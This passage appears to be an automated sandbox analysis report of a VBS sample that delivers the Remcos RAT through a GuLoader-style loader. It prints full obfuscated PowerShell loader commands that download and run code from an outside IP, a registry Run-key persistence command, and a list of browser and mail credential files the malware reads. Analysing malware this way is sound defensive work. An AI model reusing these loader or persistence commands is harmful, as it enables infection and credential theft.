,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "naergaaende" /t reg_expand_sz /d "%trkkerdrengens% -w 1 $tenementize=(get-itemproperty -path 'hkcu:\wabbles\').erende29;%trkkerdrengens% ($tenementize)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskinedJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskinedJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "naergaaende" /t reg_expand_sz /d "%trkkerdrengens% -w 1 $tenementize=(get-itemproperty -path 'hkcu:\wabbles\').erende29;%trkkerdrengens% ($tenementize)"Jump to behavior
              Source: wab.exe, 00000013.00000003.1904033991.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1906883419.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1903052624.0000000008779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,26_2_0041881C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,27_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0041739B GetVersionExW,26_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword27_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword27_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword27_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1652, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSUJump to behavior
              Source: Yara matchFile source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              1
              Registry Run Keys / Startup Folder
              212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts112
              Command and Scripting Interpreter
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              19
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets11
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture12
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428130 Sample: RFQ.NO.  S70-23Q-1474-CS-P.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 53 paygateme.net 2->53 55 geoplugin.net 2->55 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 77 Yara detected GuLoader 2->77 79 7 other signatures 2->79 11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 81 VBScript performs obfuscated calls to suspicious functions 11->81 83 Suspicious powershell command line found 11->83 85 Wscript starts Powershell (via cmd or directly) 11->85 87 3 other signatures 11->87 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 61 87.121.105.184, 49700, 49710, 80 NET1-ASBG Bulgaria 14->61 95 Suspicious powershell command line found 14->95 97 Very long command line found 14->97 99 Found suspicious powershell code related to unpacking or dynamic code loading 14->99 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 69 Writes to foreign memory regions 18->69 71 Found suspicious powershell code related to unpacking or dynamic code loading 18->71 25 wab.exe 5 327 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 57 paygateme.net 146.70.57.34, 2286, 49711, 49712 TENET-1ZA United Kingdom 25->57 59 geoplugin.net 178.237.33.50, 49713, 80 ATOM86-ASATOM86NL Netherlands 25->59 45 C:\Users\user\...\time_20240418_220147.dat, data 25->45 dropped 47 C:\Users\user\...\time_20240418_220023.dat, data 25->47 dropped 49 C:\Users\user\...\time_20240418_215903.dat, data 25->49 dropped 51 307 other malicious files 25->51 dropped 89 Detected Remcos RAT 25->89 91 Maps a DLL or memory area into another process 25->91 93 Installs a global keyboard hook 25->93 32 wab.exe 1 25->32         started        35 wab.exe 1 25->35         started        37 wab.exe 2 25->37         started        39 2 other processes 25->39 file13 signatures14 process15 signatures16 63 Tries to steal Instant Messenger accounts or passwords 32->63 65 Tries to steal Mail credentials (via file / registry access) 32->65 67 Tries to harvest and steal browser information (history, passwords, etc) 35->67 41 conhost.exe 39->41         started        43 reg.exe 1 1 39->43         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              RFQ.NO. S70-23Q-1474-CS-P.vbs0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
